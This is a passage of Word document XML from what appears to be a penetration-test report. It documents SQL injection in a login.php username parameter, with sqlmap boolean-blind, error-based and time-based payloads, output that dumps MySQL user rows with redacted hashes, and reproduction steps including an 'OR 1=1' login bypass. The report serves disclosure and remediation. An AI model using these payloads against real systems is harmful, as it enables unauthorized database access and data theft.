            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5E0BA1" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Payload: </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>username=admin' RLIKE (SELECT (CASE WHEN (7065=7065) THEN 0x61646d696e ELSE 0x28 END</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>))--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wwdv&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pass&amp;Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=Enter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF0D3DE" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47FC9DDA" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Type: error-based</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4140827F" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62DB14DB" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Payload: </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">username=admin' AND (SELECT 6019 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FROM(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT COUNT(*),CONCAT(0x7171767871,(SELECT (ELT(6019=6019,1))),0x71716b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mHqq&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pass&amp;Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=Enter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09BC03C8" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CE9CA8E" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Type: time-based blind</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000C5439" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Title: MySQL &gt; 5.0.12 AND time-based blind (heavy query)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7407CFBE" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Payload: </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>username=admin' AND 5675</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ewRQ&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pass&amp;Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=Enter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB99F56" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E22A2B2" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[16:19:31] [INFO] the back-end DBMS is MySQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C87B8D" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>web server operating system: Linux Ubuntu 18.04 (bionic)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F056D44" w14:textId="4E3D8F16" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>web application technology: Apache 2.4.29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF3173B" w14:textId="77777777" w:rsidR="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4741F4AC" w14:textId="7FF28BFD" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDF2DC8" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="45EC03A2" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Table: user</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A543D9D" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[2 entries]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E52A6B0" w14:textId="01147067" w:rsidR="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| 127.0.0.1 | root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| &lt;blank&gt; | N | *BE0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> | </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF83F4A" w14:textId="26F81A16" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65800C52" w14:textId="3F9AB3A4" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| localhost | root   | &lt;blank&gt; | N | *9FC2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>REDACTED]</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CE6B4C5" w14:textId="4AD37713" w:rsidR="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A793C" w14:textId="377EC4E3" w:rsidR="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
      <w:r>
        <w:t>The assessment team was able to</w:t>
      </w:r>
      <w:r w:rsidR="001330E3">
        <w:t xml:space="preserve"> access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001330E3">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001330E3">
        <w:t xml:space="preserve"> the data in the application SQL database through SQL injection. An attacker would be able to use this vulnerability to discover sensitive information and execute code on the application server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30149F6B" w14:textId="77777777" w:rsidR="001330E3" w:rsidRDefault="001330E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B3CA9" w14:textId="7618CA45" w:rsidR="0055639E" w:rsidRDefault="0055639E" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1D0EC" w14:textId="56B50560" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBFE73" w14:textId="63D62C77" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Put the following SQL code in the </w:t>
      </w:r>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">a' OR 1=1 -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001330E3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF2F488" wp14:editId="6CB2A798">
            <wp:extent cx="2876550" cy="2532320"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="20955"/>
            <wp:docPr id="12758215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1544" name="Picture 1" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20"/>
                    <a:srcRect r="42148"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880334" cy="253565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1330E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Code in Username Field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01A629" w14:textId="57610790" w:rsidR="001330E3" w:rsidRPr="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Input any password value and hit</w:t>
      </w:r>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="394E9354" w14:textId="360DB567" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated Injection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001330E3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEB064" w14:textId="0AA1C1D8" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001330E3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C340AE3" w14:textId="4B2F03A4" w:rsidR="001330E3" w:rsidRPr="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> against the application using the following command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
